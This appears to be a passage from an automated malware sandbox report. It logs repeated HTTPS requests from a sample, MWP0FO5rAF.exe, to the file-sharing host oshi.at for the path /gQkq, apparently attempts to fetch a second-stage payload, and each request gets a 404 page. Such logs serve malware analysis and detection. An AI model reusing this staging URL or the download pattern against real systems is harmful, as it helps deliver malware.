                                                            2025-01-10 17:58:30 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            43192.168.2.950022194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:35 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:35 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:35 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:35 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            44192.168.2.950023194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:37 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:37 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:37 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:37 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            45192.168.2.950024194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:38 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:40 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:40 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:40 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            46192.168.2.950025194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:41 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:42 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:42 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:42 UTC1185INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up
                                                            2025-01-10 17:58:42 UTC664INData Raw: 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 2f 63 6d 64 22 3e 43 6f 6d 6d 61 6e 64 2d 6c 69 6e 65 20 69 6e 74 65 72 66 61 63 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 2f 73 68 61 72 65 78 22 3e 53 68 61 72 65 58 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 63 6c 61 73
                                                            Data Ascii: <a class="nav-link" href="/cmd">Command-line interface</a> </li> <li class="nav-item"> <a class="nav-link" href="/sharex">ShareX</a> </li> <li class="nav-item"> <a target="_blank" clas


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            47192.168.2.950026194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:43 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:44 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:44 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:44 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            48192.168.2.950027194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:45 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:46 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:46 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:46 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            49192.168.2.950028194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:47 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:48 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:48 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:48 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            50192.168.2.950029194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:50 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:51 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:51 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:51 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            51192.168.2.950030194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:52 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:52 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:52 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:52 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            52192.168.2.950031194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:54 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:54 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:54 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:54 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            53192.168.2.950032194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:55 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:56 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:56 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:56 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            54192.168.2.950033194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:58:58 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:58:59 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:58:59 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:58:59 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            55192.168.2.950034194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:00 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:01 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:00 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
                                                            2025-01-10 17:59:01 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            56192.168.2.950035194.15.112.2484437596C:\Users\user\Desktop\MWP0FO5rAF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-10 17:59:02 UTC37OUTGET /gQkq HTTP/1.1
                                                            Host: oshi.at
                                                            2025-01-10 17:59:04 UTC158INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 17:59:04 GMT
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 1849
                                                            Connection: close
